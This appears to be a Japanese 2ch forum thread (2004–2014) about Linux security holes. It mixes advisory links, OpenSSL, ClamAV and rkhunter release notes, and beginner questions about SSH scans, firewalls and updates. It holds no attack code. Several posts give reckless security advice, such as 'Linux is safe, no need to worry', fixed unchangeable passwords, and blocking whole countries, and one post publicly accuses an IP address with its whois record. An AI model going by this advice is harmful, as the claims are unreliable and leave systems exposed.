login:Penguin :04/05/20 14:21 ID:WWYnnNvB
cvsとsubversionにセキュリティホールだと。
363 :
login:Penguin :04/05/21 18:19 ID:6uFN7DQY
埋めますた
sourceforge.jpがやられたのってこれかね。
365 :
login:Penguin :04/05/21 18:39 ID:6uFN7DQY
366 :
login:Penguin :04/06/10 15:04 ID:swAq85SC
367 :
login:Penguin :04/06/10 23:51 ID:Biho7Cx0
今回はどこが醜態を晒すのか見物
今回それはないヨ。exploitが晒されていないからね。 侵入される奴もヘタレなら侵入する奴もヘタレ。
(´-`).。oO(板が違う気がする…)
372 :
login:Penguin :04/06/28 15:18 ID:7wrh5jjV
373 :
login:Penguin :04/06/29 14:45 ID:znjWYPYB
>>373 ITMediaは二週間前の脆弱性を今頃騒いでどうする?
もしかして腐れDebian厨が居るのか?
↑腐れヘドロ厨
バグだらけのFedora何て使ってるとストレス溜まるんでつね。
イキロ
>>374
Deb厨って本当に社会のあちこちで迷惑をかけてるな
378 :
login:Penguin :04/07/01 19:48 ID:OqSpKNxT
379 :
login:Penguin :04/07/03 18:42 ID:I8EJ9gk9
380 :
login:Penguin :04/07/04 00:08 ID:4SqICt0G
381 :
たわば :04/07/23 14:07 ID:2ZKDc5PV
382 :
login:Penguin :04/08/17 16:56 ID:kG5XOZPe
384 :
login:Penguin :04/09/17 14:42:44 ID:VXVHqApo
>>385 > Linuxにも感染するそうです。
ソースきぼん。
それよりJpeg-GDIウィルスのほうが重大問題だけどな。
>>386 あ、ごめんLinuxは影響なしでした。
389 :
login:Penguin :04/10/02 20:11:13 ID:0N5ydXGU
390 :
login:Penguin :04/10/09 20:01:16 ID:xhbHGJ5V
brutesshによるサーバへのアクセスがあるのですが、 これは、感染によって拡がるものなのでしょうか。 LAN内からのアクセスが見つかり、どうすべきか考えています。
>>390 ウィルスではないので感染はしない。
LAN内にクラックされたマシンか不届き者が居る。
393 :
login:Penguin :04/10/21 10:04:37 ID:FxTdJBK4
394 :
login:Penguin :04/10/25 17:36:28 ID:bqye+ZzN
395 :
login:Penguin :04/10/26 10:31:11 ID:/V4ZShQ8
396 :
login:Penguin :04/10/26 17:16:28 ID:/V4ZShQ8
397 :
login:Penguin :04/10/27 07:53:07 ID:4omHsqys
インターネットに接続しない場合は、セキュリティホールは 関係ないよね。
ローカルでログインしたユーザーからやられる場合はある。
399 :
login:Penguin :04/10/28 19:45:52 ID:Z91dAyo0
僕のセキュリティホールも埋めてください。
埋めてやるからroot権限をくれ。
402 :
login:Penguin :04/10/31 16:59:20 ID:+ety0bys
OpenSSL version 0.9.7e released
Fix race condition in CRL checking code.
Fixes to PKCS#7 (S/MIME) code.
http://www.openssl.org/
403 :
login:Penguin :04/11/03 11:59:04 ID:eDxNwooz
僕のヒップホールも埋めてください。
×ヒップホール ○アヌス
406 :
login:Penguin :04/11/10 00:41:58 ID:/czt/x2r
407 :
login:Penguin :04/11/18 17:19:34 ID:wovyIy70
408 :
login:Penguin :04/11/18 21:46:20 ID:4065SAaP
玄箱HG買ってきて、NATでsshと thttpを通して使っていますが、 どの程度脆弱なのか教えてほしい。 付属のバイナリそのままです。
410 :
login:Penguin :04/11/21 18:41:00 ID:YIsvNf8c
411 :
login:Penguin :04/11/21 23:27:49 ID:nQ1PzIeT
>>410 Samba2.2.Xもアウトの模様。
Sambaチームとしては、2.2系はすでにディスコン扱い。
RedHat AS系のsrc.rpmからパッチ抜き出して、手パッチ当てることで対応可能。
お勧めは、3.0系についでにアップデート。
http://slashdot.jp/comments.pl?sid=224264&cid=655792 >対してDebianですが、2.2系のsambaを使っているWoodyに対しては、対応の必要無し [debian.org]としているようです。
>Stefan Esser氏の情報によると、SMB_QUERY_FILE_NAME_INFOとSMB_QUERY_FILE_ALL_INFOへの返答にunicodeが含まれるときにオーバーフローがおこる、としています。
>通信路上でのunicode対応は3.0での新機能であることから、
>2.2系では問題ない、ということのようです。
どっちやねん。
>>412 普通はRed Hatの言う事を信じるだろ
>>412 パッチあてたことによる副作用は(メモリ喰う意外は)ないはず。
415 :
login:Penguin :04/11/22 19:39:58 ID:0XykCTIm
416 :
login:Penguin :04/11/24 16:44:02 ID:b7roQRZ3
417 :
login:Penguin :04/11/25 00:52:00 ID:ISOyf0NF
大学でlinux使ってるんだが自分のPCのホスト名が書き換えられてlocalhost になってんねんけどこれってハッキングされた??ハッキングされた場合の 対策を教えてください。
>>417 あたりまえのことしか書かれてない退屈な記事だが、そんなもんが記事になるほど
常識が通用しない世の中になってるのか
逆にいえば一般に普及しているともいえるが
>>418 判断がつかないようなスキルなら、必要なデータをバックアップして全てのディスクをフォーマット
OSの再インストールが宜しかろう
>>418 もともと設定されていなかったんじゃないか?
Red Hat系のディストリビューションではホスト名をlocalhost.localdomainにしておけば
DHCPやDNSの逆引きで自動的に自分のホスト名を設定する。
起動時にネットワークに継っていないとlocalhostのままになってしまう。
421 :
418 :04/11/26 20:10:15 ID:k5e8vXSr
>>419 Linuxのセキュリティの勉強をして判断できるようになるまでオフラインで作業する事にしました。
インタネットをする時はwindowsでします。
>>420 使ってるのはTurbolinux 10です。4月から使ってるんだけどつい最近になってホスト名が
勝手に変更された。でも今までは再起動すれば元に戻ってた。でもこの前から戻らなくなって
しまったから今は常にオフラインで作業してる
422 :
login:Penguin :04/11/26 20:33:42 ID:dnnkHd3Q
インタネットをする時
まぁいいじゃん
>>421 ipchainsや iptablesとかで、大学内の IPアドレスだけを受け入れる設定にすれば良いんでないの?
Firewallってやつね。
425 :
418 :04/11/30 04:00:34 ID:0XEsMbzU
>>424 ありがとう。早速使ってみます。今まですごい無防備だった・・・。同じ教室内にクラッカーがいる
のはわかってるんだが・・・。LinuxにはNortonみたいな便利なセキュリティソフトはありますか?
426 :
login:Penguin :04/11/30 09:52:06 ID:UiU6OPG7
> 代替ブラウザのMozilla Browser、Mozilla Firefox、Opera、Apple Safari ( ゚д゚)ポカーン
428 :
424 :04/12/01 22:24:36 ID:WZMXvOti
>>425 あなたがやられたことは、ウィルスではないからウィルスソフトは関係無いよ。
googoleで linux セキュリティ 等で検索して出たページを眺めてみれば、
何をやれば良いかが分かると思う。
429 :
login:Penguin :04/12/02 16:51:45 ID:uIcjRdJU
431 :
418 :04/12/06 04:11:59 ID:m7qkMCab
432 :
login:Penguin :04/12/08 08:53:04 ID:6AL/27aH
433 :
login:Penguin :04/12/09 15:34:07 ID:M1bxsokm
434 :
login:Penguin :04/12/09 17:37:02 ID:/9Bn7ZUs
435 :
login:Penguin :04/12/12 11:55:55 ID:mgIoIJ5c
同じ物。 終った頃に池沼が騒いでるだけ。
437 :
login:Penguin :04/12/15 09:05:03 ID:+nSB8nzE
438 :
login:Penguin :04/12/15 14:36:32 ID:oedS6vkw
442 :
login:Penguin :04/12/18 21:00:03 ID:hjmC5PT7
443 :
login:Penguin :04/12/21 18:36:00 ID:hzu57Fj/
444 :
login:Penguin :04/12/21 22:40:47 ID:30PuipQb
445 :
login:Penguin :04/12/28 20:17:37 ID:gwu6iJyi
447 :
login:Penguin :04/12/28 20:27:49 ID:wQ0sP7mi
不正アクセス者
210.233.171.215
f71-215.knet.ne.jp
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 210.233.171.0
b. [ネットワーク名] KNET
f. [組織名] Knet
g. [Organization] Knet
m. [運用責任者] YA2419JP
n. [技術連絡担当者] YA2419JP
p. [ネームサーバ] dns.knet.ad.jp
p. [ネームサーバ] dns2.knet.ad.jp
y. [通知アドレス]
[email protected] [割当年月日] 2004/05/10
[返却年月日]
[最終更新] 2004/05/10 22:02:02 (JST)
[email protected]
448 :
login:Penguin :04/12/28 20:49:11 ID:eKoW9pyP
( ゚д゚)ポカーン
449 :
login:Penguin :04/12/29 10:41:25 ID:6fSkhuYM
450 :
login:Penguin :05/01/01 08:39:13 ID:kFu0LjTp
451 :
login:Penguin :05/01/05 21:59:12 ID:ZS0EbUa0
453 :
login:Penguin :05/01/15 00:01:44 ID:0C6Q/s/t
454 :
login:Penguin :05/01/15 00:02:30 ID:0C6Q/s/t
456 :
login:Penguin :05/01/19 01:52:44 ID:sNwJCWuH
457 :
login:Penguin :05/01/25 19:05:49 ID:sthPlgmU
458 :
login:Penguin :05/02/03 12:11:45 ID:peK1ruFi
459 :
login:Penguin :05/02/08 16:20:18 ID:3wyRdacD
460 :
login:Penguin :05/02/09 16:46:17 ID:Pnc07aj7
461 :
login:Penguin :05/02/09 17:34:54 ID:+iRiNy7x
462 :
login:Penguin :05/02/10 23:37:09 ID:4PvXQ5gy
463 :
login:Penguin :05/02/11 11:33:23 ID:UCimrSLJ
464 :
login:Penguin :05/02/17 03:53:34 ID:Q0DXFhPR
>>464 ぉぃ! いつもLinux勧告ウォッチを貼ってる野郎!
てめぇに言っておきたいことがある。
数行ほど、めぼしい情報を拾って合わせて貼って頂けると大変嬉しく思います。
お手数ですが、よろしければ御検討ください。お願いします。
>>466 5年前ならともかく、今ではにわかには信じ難い話だな。
ま、JPCERTだから2chの噂話レベルの信憑性なわけだが。
しつこく続いていたsshのスキャンはフィッシング詐欺のサーバ探しだったようだ。 糞パスワード付けていた馬鹿のサーバが侵入されたってわけだ。そこで我が輩の提案。 インスコすると自動的に乱数でパスワードを作って管理者にも変更を認めない。 馬鹿が叛乱する世の中ではこれが一番安全なやりかただと断言できる。
471 :
login:Penguin :05/02/25 01:52:57 ID:ma7hFUNy
Linux勧告ウォッチ - 2005年2月18日(金)
http://japan.linux.com/security/05/02/24/036217.shtml >今週は、libXpm、evolution、mailman、hztty、xpcd、sympa、netkit-rwho、toolchain、 htdig、synaestheia、awstats、typespeed、emacs、gftp、python、openoffice、カーネル、 kdeedu、gallery、
>webmin、perl-squid、ht/dig、opera、vmware、lighttpd、kstars、 midnight commander、drakextools、cpio、enscript、mysql、rwho、kdelibs、xpdf、libtiff、vim、 ethereal、thunderbird、squidに関する勧告が公開された。
>>471 おつかれさまです。
465じゃないけど、ありがとうございます。
473 :
login:Penguin :05/02/25 23:02:08 ID:aF9fIQ+9
乱数で作ってるからばれない。 PCの横にマジックで書いといてもネットの向こう側に居る犯罪者にはバレない。 パスワードを漁るために空き巣に入る泥棒は居ない。
つまらん勉強ばっかしてるから俺の話が突飛に思えるんだよ馬鹿
>>474 いやそういう意味ではなくて、たとえば人経由でいったんばれたとして
パスワード変えられないってのはまずくないのかなと。
クマー
>>477 再インスコすればいい。そんな事もわかんないから馬鹿だって言われるんだよ。
再インスコは勘弁してくれ。 そういう方式にしといて、それなりにいろいろ分かってないと変更できないような しくみつくればずいぶんちがうべ。 「サーバーくらいなら初心者でも立てられる」なんて言ってる奴は八割がた これでツブせるだろうし、踏み台にされる九割がた、そういうアフォだそうだし。 ・・・今日も中国から毒電波来てるが、こればっかりはしゃあないか。
それなりにいろいろ分ってるつもりの馬鹿がチラシの裏で裏技公開とかやっちゃうから駄目
>>479 おまえ学生かちっこい会社の社員だろ?wあまりの視野の狭さにわらたw
>>482 その言葉そっくりそのままオマエに返してやろう。視野狭窄は時に命にかかわるぞw
>>483 なにを返されたのかわからんが?w小学生並だなw
ここでも暴れてるし・・・
こんな幼稚なケンカが2ちゃんで見れるとは。
別に珍しくも無いだろ
ssh鯖にクライアントの公開鍵を登録して、未登録なアクセスを蹴ればいいじゃん。 もちパスワード認証は×で。
そもそも外部に公開するsshサーバーでパスワード認証って危なくないの? 俺LAN内の特定クライアント機以外にssh公開してないけど、鍵暗号方式のみで認証させてる。
おまえらって幼稚だな。
もうすぐは〜るですねぇ、っとくりゃ。
493 :
login:Penguin :05/03/03 06:03:49 ID:lCP0zlq9
495 :
login:Penguin :05/03/09 20:24:41 ID:shF6sxJU
Linux勧告ウォッチ - 2005年3月4日(金)
http://japan.linux.com/security/05/03/09/0256229.shtml >今週は、mod_python、bsmtpd、gaim、bind、gnucash、dhcp、at、vixie-cron、lam、pvm、 radvd、selinux-targeted- policy、tcsh、openoffice、gamin、cmd5checkpw、
>uim、UnAce、MediaWiki、phpBB、 phpWebSite、xli、xloadimage、firefox、squid、kdenetwork、nvidia、curl、uw-imap、 cyrus-saslに関する勧告が公開された。
496 :
login:Penguin :05/03/15 16:35:59 ID:9Sx4GV1E
Linux勧告ウォッチ - 2005年3月11日(金)
http://japan.linux.com/security/05/03/15/017205.shtml >今週は、clamav、カーネル、squid、kppp、helixplayer、tzdata、libtool、firefox、ipsec- tools、dmraid、gaim、libexif、gimp、yum、
>grip、libXpm、xv、ImageMagick、Hashcash、 mlterm、dcoidlng、curl、gftp、cyrus-imapd、unixODBC、mcに関する勧告が公開された。
497 :
login:Penguin :05/03/16 22:22:17 ID:03P5AesU
498 :
login:Penguin :05/03/16 22:28:36 ID:6KgSXSMv
>埋めとけよ 埋め方って apt-get update でいいんでつか?
>>498 Vine房は公式ページを隅まで100回読め
>>498 apt-get update;apt-get upgrade
でございます。
rkhunter 1.2.2
乙
vsftpd 2.0.3
rkhunter 1.2.3
OpenSSL 0.9.7f
nessus 2.2.4
507 :
login:Penguin :2005/04/05(火) 08:51:04 ID:oXj0aGCx
508 :
login:Penguin :2005/04/05(火) 19:35:28 ID:WbnW/bJO
509 :
login:Penguin :2005/04/06(水) 15:45:49 ID:o4XbggVk
Linux勧告ウォッチ - 2005年4月1日(金)
http://japan.linux.com/security/05/04/06/0047246.shtml >今週は、ethereal、カーネル、netkit-telnet、mc、mailreader、samba、mozilla、lsof、 thunderbird、epiphany、devhelp、spamassassin、slypheed、
>krb5、xorg、telnet、 foomatic、squid、ImageMagick、gdk、mpg321、ipsec-tools、htdig、grip、mysql、 XFree86、MySQLに関する勧告が公開された。
clamav 0.84rc1
511 :
login:Penguin :2005/04/12(火) 14:05:43 ID:ZkK3ZrD8
OpenSSL 0.9.7g
513 :
login:Penguin :2005/04/14(木) 01:30:08 ID:vR5vsyXy
515 :
login:Penguin :2005/04/16(土) 20:28:59 ID:HRup7FY4
516 :
login:Penguin :2005/04/18(月) 16:02:40 ID:PIkwm5sQ
517 :
login:Penguin :2005/04/20(水) 02:08:54 ID:/NpjNEUV
cvsのdebianパッチまだ〜?
519 :
login:Penguin :2005/04/28(木) 15:48:21 ID:4g8dKA1q
Linux勧告ウォッチ - 2005年4月22日(金)
http://japan.linux.com/security/05/04/26/0149236.shtml >今週は、MySQL、PHP、libexif、gtkhtml、info2www、geneweb、f2c、XFCE、vixie-cron、at、 nasm、aspell、urw-fonts、htdig、alsa-lib、
>curl、HelixPlayer、cvs、foomatic、 monkeyd、mplayer、xloadimage、logwatch、カーネル、OpenOffice、PostgreSQLに関する勧告が公開された。
520 :
login:Penguin :2005/04/28(木) 16:51:43 ID:4g8dKA1q
521 :
login:Penguin :2005/05/03(火) 01:44:32 ID:Iw9fmQYW
522 :
login:Penguin :2005/05/09(月) 13:33:11 ID:3POvZzAZ
523 :
login:Penguin :2005/05/10(火) 21:50:38 ID:BSxLP988
RootKit Hunter 1.2.6
525 :
login:Penguin :2005/05/18(水) 19:44:52 ID:IKEgOcIP
526 :
login:Penguin :2005/05/20(金) 03:07:32 ID:dcSABdhI
527 :
login:Penguin :2005/05/22(日) 00:22:51 ID:duekTQwd
HTMLメールには脆弱性があるって事だな
531 :
login:Penguin :2005/05/22(日) 15:30:09 ID:BdkNpKZc
>531 Windows 向けしか出てないと思ってたけど、私の勘違い?
>>532 他のOSへの対応は捨てられたみたいですね。
Netscapeのウリだったと思うんですが。
>>533 そもそもWindows以外のOSのユーザでFirefoxでもMozillaでもなくNetscapeを
使ってたユーザなんていたのだろうか・・・
>>534 普通にいるべ。Solaris でも使うし、*BSD でも使うべ。
>>536 いやいや、4.xまでは対応するMozilla側が安定してなかったりで
使う理由がわかるんだけど、6.x以降は使う意味があるのかな、と。
# そもそも6.x以降はWindows, Linux, Macしか選択肢がないが
538 :
login:Penguin :2005/05/26(木) 00:15:53 ID:8RgdaCKa
PowerDNSだけの問題のようだな。まったく思わせぶりなんだから。
メールクライアントソフトにおける mailto URL scheme の不適切な解釈
http://jvn.jp/jp/JVN%23FCAD9BD8/index.html # Sylpheed は svn trunk (rev.294) で修正された模様
# > * src/compose.c: compose_entries_set(): don't interpret Bcc header
# > field (conform to RFC 2368).
俺のセキュリティーホールはもう手遅れです
彼女のセキュリティーホールを突破しました
> 24 May - Version 1.2.7 available > A new version with another update for the databases > updater and additional OS support.
544 :
login:Penguin :2005/06/02(木) 15:18:15 ID:8KgKc3tF
545 :
login:Penguin :2005/06/03(金) 21:36:27 ID:TJxSbhU/
Linux Advisory Watch - June 3rd 2005
http://security.linux.com/security/05/06/03/128213.shtml >This week, advisories were released for qpopper, openssl, php4, bzip2,
>ImageMagick, bind, netpbm, gxine, imap4d, elfutils, gnutls, and postgresql.
546 :
login:Penguin :2005/06/06(月) 20:00:57 ID:nf/+mWXF
547 :
login:Penguin :2005/06/06(月) 23:17:18 ID:1/IasyVS
548 :
login:Penguin :2005/06/07(火) 10:51:48 ID:TIwnPZi0
>>547 Mozilla/Firefoxに修正したはずのセキュリティ・ホールが“復活”,サイトの偽装を許す : IT Pro ニュース
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050606/162208/ 記事の終りにこんなものが。
なお今回のセキュリティ・ホールは,Internet Explorer(IE)やOpera,Netscapeといった複数のブラウザに見つかっている(関連記事)。
その後,例えばOperaはバージョン 7.52で,Netscapeはバージョン 7.2で修正された。
冒頭で書いたように,FirefoxとMozillaも修正されたものの,最近のバージョンで再び確認された。
IEについては,修正パッチなどが提供されないまま現在に至っている。
550 :
login:Penguin :2005/06/11(土) 05:43:48 ID:t9YiCDuS
Linux Advisory Watch - June 10, 2005
http://security.linux.com/security/05/06/10/124248.shtml >This week, advisories were released for krb4, mailutils, traversal, Wordpress,
>SilverCity, kdbg, ImageMagick, openssh, dbus, rsh, and the Red Hat kernel.
551 :
login:Penguin :2005/06/11(土) 07:22:56 ID:t9YiCDuS
552 :
login:Penguin :2005/06/11(土) 12:41:44 ID:2Kb3/lJq
553 :
login:Penguin :2005/06/11(土) 13:03:16 ID:bwoE+Bbm
(´・ω・) カワイソス
友人にLinuxにはWinみたいなセキュリティホールが無いと聞いて Linux入れてみたんですが今度はセキュリティホールは埋めておけと言われて 何が何だかです?? LinuxとWinとでセキュリティホールの言葉の意味が違っていますか? あとLinuxでセキュリティ関係のオートアップデートは無いのでしょうか?
おまえの友人が馬鹿だという可能性に気付かないおまえも馬鹿
>>554 Fedora CoreやRed Hat Enterprise Linuxでは自動アップデートがデフォルト有効のはず。
他のLinuxディストリビューションでも同様か、簡単な設定で自動アップデートに出来る。
>>554 メジャーなプログラムの既知のセキュリティホールは自動設定ならほぼ即日で埋まるけど
セキュリティ的に脆弱な設定のまま無言で動作するのは極めて簡単な上
誰もそのことを君に指摘してくれないから気をつけな。
558 :
login:Penguin :2005/06/12(日) 09:22:18 ID:rcQf4qhX
559 :
login:Penguin :2005/06/12(日) 10:00:49 ID:IBYpviLb
>>558 ライブドアの中身のなさを如実に表わしてるな・・・
こんなしょーもない開発者しかいないのか?
Linspire(Lindows)とTurboはダメだな・・
>>557 自動アップデートの件ありがとうございました。
しかし残念ながらWinに戻ろうと考えています。
私がLinux入れたことを、その友人がふれ回ったらしく自称Linuxのプロと言う奴から
いきなり電話がかかって来る始末。なんか面倒なことになりそうなんで…
セキュリティ性が高いから防衛庁に使われているとか、高位のハッカー?じゃないと
ハッキングは無理とか数値計算が3倍速くなるとか・・・マジなんですか??
なかなか愉快なお友達をお持ちのようで
友人がまさか電波を連れてくるとは思いませんでした。 朝7時ぴったりに電話が掛かってきて第一声が「Linuxつかってんの?」ですよ・・・ そりゃ私3流大学ですがコイツがおかしいのだけは分かります。 こいつ等2人を合法的に殺す方法を教えて欲しいくらいです。
類友と反省してまっとうに生きろ
566 :
login:Penguin :2005/06/15(水) 21:02:46 ID:4oB09Z9t
,ィミ, ,ィミ, 彡 ミ 彡 ミ, ,,彡 ミ、、、、、、、、彡 ミ, (⌒) 彡;:;: ミ, ( ヽ / ̄ ̄ ̄ ̄ ̄ ̄ 〜三;:;::::: 彡〜 ノ ノ < だったらあきらめろよ ~~三:;:;:;::::: -=・=- -=・=- 三~~ ヽ ( \______ ~~彡::;:;:;:;:::.. ___ ,三~~ ( ノ ,,,,, : ;; ~~彡;:;:;:;:;:;:;:. |┴┴| ,ミ~~ ノノ ;'" ,,ノ―、 ,;' ~~彡:;:;:;:;:;:;:;:;. ノ――| ---==ニノ ,;'′ >=ニ(二二二() ...-''''""~~,::;:;::;::;::;::;' ミ,, ,;'′ ゝ--〈 ;;:;;;;;;;;;;;;;;;;;;;;;:;:;:;:;:;:;:; i! ミ,,,,;'′ `ー‐' ::::ミミミ:;:;:;: ミ:: ,;' ̄ ̄ ̄ ̄|
567 :
login:Penguin :2005/06/18(土) 11:05:34 ID:oGQfpUQA
http://security.linux.com/security/05/06/17/1322200.shtml >This week, advisories were released for mikmod, tcpdump, yum, elinks, parted,
>system-config-securitylevel, checkpolicy, spamassassin, gaim, libextractor, Ettercap, shtool,
>gedit, MediaWiki, gzip, gftp, squid, rsh, sysreport, telnet, bz, and mc.
568 :
login:Penguin :2005/06/23(木) 20:29:36 ID:P3+SbVls
569 :
login:Penguin :2005/06/24(金) 17:31:00 ID:tEoAOdYr
Linux Kernel Two Vulnerabilities (Linux 2.6.x)
http://secunia.com/advisories/15786/ 1) An error exists in the handling of access to ar.rsc via ptrace and restore_sigcontext.
2) An error in the delivery of signals can cause a kernel panic when a sub-thread "exec" with a pending timer.
2.6.12.1 にアップデートしましょう。
570 :
login:Penguin :2005/06/25(土) 01:08:14 ID:ijinZqdM
http://security.linux.com/security/05/06/24/1122213.shtml >This week, advisories were released for elinks, mikmod, tcpdump, parted,
>system-config-securitylevel, checkpolicy, spamassassin, gaim, ruby, arts, kde, util-linux,
>sudo, gawk, mc, pilot-link, alsa-utils, jpilot, ImageMagick, hwdata, webapp, cpio,
>squirrelmail, and bzip2.
571 :
login:Penguin :2005/07/02(土) 13:34:03 ID:W4bM1soj
http://security.linux.com/security/05/07/01/1313243.shtml >This week, advisories were released for crip, Network Manager, HelixPlayer, gedit, gzip, selinux, gnome, openssh, libwpd, openoffice,
>openssh, binutils, totem, rgmanager, magma-plugins, iddev, fence, dlm, cman, css, GFS, mod_perl, Heimdal, and sudo.
572 :
login:Penguin :2005/07/08(金) 11:19:22 ID:3of0LGOn
zlib はなかなか枯れないね
574 :
login:Penguin :2005/07/28(木) 02:14:47 ID:JtHgZDAK
枯れてるOSと枯れてない彼女が好きです。 枯れてないOSと枯れた彼女が居るでつ、、
576 :
login:Penguin :2005/07/29(金) 12:34:38 ID:ss8lSczc
http://hideaway.under.jp/Firefox/ 【緊急】JavaScriptActionsにGreasmonkeyと同じく脆弱性
JavaScriptActions 2.1.0/2.0.0/1.9.1.2にて
Chrome特権で任意のコードを実行できる脆弱性。
近日中に対策版を出す予定でですが、
現在Installしている方は速やかにUninstallをお願いいたします。
かなり危険な脆弱性です。
577 :
login:Penguin :2005/07/29(金) 12:39:57 ID:ss8lSczc
578 :
login:Penguin :2005/07/29(金) 12:43:17 ID:ss8lSczc
579 :
login:Penguin :2005/08/03(水) 15:03:54 ID:0die0yx0
8/15日はサーバー停止させておこうかな。
>>579 中国と韓国からのパケットをDROPすれば無問題。
582 :
login:Penguin :2005/08/19(金) 12:47:16 ID:0ixP/ad/
>>582 日本語版の方もちゃんと7.0.1出てたよ。
対応速くて偉いね。
584 :
login:Penguin :2005/08/20(土) 09:44:45 ID:KD20PUI6
なあ、もまえら、アンチウイルスソフトはどうしてるの? ウイルスバスタなんかのLinux用の奴なんか高くて買えないし(10万以上する)。 なんか良いアンチウイルスソフトあったら教えて。 教えてエロイ人。
デスクトップならいらんやろ
>>584 AntiVir or BitDefender
いずれも無償利用可能。
587 :
[・∀・] :2005/08/20(土) 12:23:00 ID:eGK2FvBS
>>585 >>586 >>587 もまえらサンクス。
いや、学術目的でちろっと公開するLinuxサーバ立てようかとおもってるんですよ。
まだ調査の段階でためしに立てるんで、高いウイルスソフトなんて買えないからどうしようかと思いまして。
Linuxあまり詳しくないし、調べてるだんかいです。
ウイルス関連情報スレも覗いてみまつ。
589 :
login:Penguin :2005/09/21(水) 16:30:16 ID:Jh7+IFzg
馬鹿が多過ぎるんでこっちにも書いとく。 Linux版のFirefox(たぶん他のUNIX系OSも)に深刻な脆弱性が見付かってる。 ユーザ権限で任意のコマンドを実行可能。 悪用するにはfirefoxのコマンドラインに細工したURLを与える必要があるが、 専用ブラやメーラーからブラウザが起動される場合がこれに相当する。 悪用は簡単。実に簡単。これから悪用URLが2chじゅうに貼られるかも。 これを修正したFirefox 1.0.7が間もなくリリースされる予定だが、 リリースを待たずに脆弱性の詳細が一般に告知されてしまった。 今のところの対策は、 ・専ブラやメーラ上のリンクをクリックしない。 ・Mozillaにはこの脆弱性は無いのでしばらくはMozillaを使う。 ・先にFirefoxを立ち上げてからリンクをクリックすればこの脆弱性から逃れられる。
590 :
login:Penguin :2005/09/21(水) 16:51:29 ID:Jh7+IFzg
これだけだから騒いでるのにホントにもう馬鹿しか居ねぇな。 一回と言わず百回くらい死ねよ。
なんだ、電波かよ。レスして損した。
* chkproc.c o bug fix for FreeBSD: chkproc was sending a SIGXFSZ (kill -25) to init, causing a reboot o more fixes to better support Linux threads * chkutmp.c o improved execution speed * chkwtmp.c o segfault fixed * chkrootkit o Mac OS X support added o new rootkits detected: rootedoor o some bug fixes
This version is a maintenance release, that contains numerous bug fixes, including a number of security fixes related to the overwriting of the GLOBALS array. All users of PHP 4.3 and 4.4 are encouraged to upgrade to this version.
clamav 0.87.1
599 :
login:Penguin :2005/11/14(月) 15:38:51 ID:T2zvy2jl
601 :
login:Penguin :2006/01/01(日) 20:40:38 ID:1I9cMUb6
ひさしぶりに覗いてみたがやはり馬鹿しか居ないようだ。リセットリセット。
603 :
login:Penguin :2006/01/16(月) 13:18:16 ID:cr3nbkAt
SELinux MLでのドキュメント和訳開始とかいいんだけど、 不治藁ウザイ
>>はい
ウイルス大作そふと使ってる? 俺は使ってない
test
test
test
611 :
login:Penguin :2007/10/18(木) 21:11:11 ID:ikAZ28Hh
_ r-、' ´ `ヽr-、 ィ7 /l: ハヽハ トヾ 駄スレを隠すことは、この俺が許さん! '|l |'´_` ´_ `| || 信念に基づいて行動する。 | |´ヒ} ヒ}`! l| それを人は正義と言う。 __ノ゙). 从 l, _'_. |从 今俺が行ってることは、上げ荒らしではない。 ,_'(_ ノ_ヽ ヾl.> - ,イ;リ 正義という名の粛清だぁ! { f:テ} {'f:テ}',/\ヽ--//ヽ ヽ,r─‐ 、ィ .、、 i l>Y<! i '、 バーニング! / iゝ_ノ iヽ /l |l l ', lンヽ/ムノじ
∧_∧∩ ( ゚∀゚)彡 ⊂ ⊂彡 eroda! eroda! (つ ノ (ノ
石油里程掘
2009年初カキコ
SELinux、使っていません
age
618 :
login:Penguin :2011/01/10(月) 01:55:56 ID:G2EODJS6
俺の尻にセキュリティホールが! 誰かに埋められるのか!?
俺の尻にもセキュ(ry
>>618 お前ので埋めてくれ
ご存じの方教えてください /dev/memというのがありますが、BSDだとセキュリティレベルで アクセス不可に出来ますが、Linux(の何らかのディストリビューション) ではどのように対策してるのでしょうか? BSD と同様の機構が用意 されてるのでしょうか?
誰に対してアクセス制御したいん?
>>620 パーミションによる保護だけでは不十分なのでは、ってこと?
623 :
620 :2011/01/12(水) 22:51:09 ID:T03M34JA
>>621 root 乗っ取られた場合でも大丈夫なように書き込み禁止とか(Xは使えなくて良い前提)
>>622 その通りです
>>623 /dev/memを書き込みできないようにして何を守るんですか?
rootは任意のカーネルモジュールを読み込めるんですよ?
628 :
620 :2011/01/13(木) 23:13:28 ID:VPGufbny
なるほど、ありがとうございます。 じっくり見てみます。
OpenSSL 1.0.0d, 0.9.8r
> 08-Feb-2011: OpenSSL 1.0.0d is now available, including important bug and security fixes
> 08-Feb-2011: OpenSSL 0.9.8r is now available, including important bug and security fixes
http://openssl.org/news/secadv_20110208.txt
631 :
login:Penguin :2011/03/26(土) 11:51:16.66 ID:d+c+cr7h
埋め
633 :
login:Penguin :2014/03/25(火) 14:15:52.00 ID:7+OVV7FN
>大阪府三島郡島本町の小学校や中学校は、暴力イジメ学校や。 島本町の学校でいじめ・暴力・脅迫・恐喝などを受け続けて廃人同様になってしもうた僕が言うんやから、 まちがいないで。僕のほかにも、イジメが原因で精神病になったりひきこもりになったりした子が何人もおる。 教師も校長も、暴力やいじめがあっても見て見ぬフリ。イジメに加担する教師すらおった。 誰かがイジメを苦にして自殺しても、「本校にイジメはなかった」と言うて逃げるんやろうなあ。 島本町の学校の関係者は、僕を捜し出して口封じをするな >島本町って町は、暴力といじめの町なんだな 子供の時に受けた酷いイジメの体験は、一生癒えない後遺症になるなあ
LiveCDで記録できるデバイスなしで使うときだけ使っているから 何も奪われないし、改変などできるわけない。 毎日再起動したら初期状態で変更は全て消える。 これでも感染すると言う奴がでてくるのが2chの姿。 FWなんてISPが貸してくれるルータで充分な。WANに直でつながるISP とか入るほうが問題だろ。 だいたいほとんどの問題はLAN上で動くファイル共有やらOSの遠隔操作 機能やらIEとOEだろ。これらを使っていない時点でなんの問題あるの? メール?バカ?メールはメール専門PCを別セグメントで用意するから問題ない。
こういうのが一番危ない 恐ろしいのはセキュリティ板住人の9割がこういう思想なこと
636 :
login:Penguin :2014/04/01(火) 05:17:28.69 ID:HvNxfc0o
>>634 ウイルスには感染可能だぞ
まあ感染しても再起動時にはリセットされて真っさらな状態に戻るけどな
637 :
login:Penguin :2014/04/01(火) 06:23:44.53 ID:6BIGNOml
Linuxなので安全です。 心配するだけ無駄。
ここまで大げさにしたら どうなんるんだろ、仕掛人および実行犯
ただの妄想だから気にすんな
642 :
login:Penguin :2014/09/28(日) 23:51:35.54 ID:gu/EcnBP
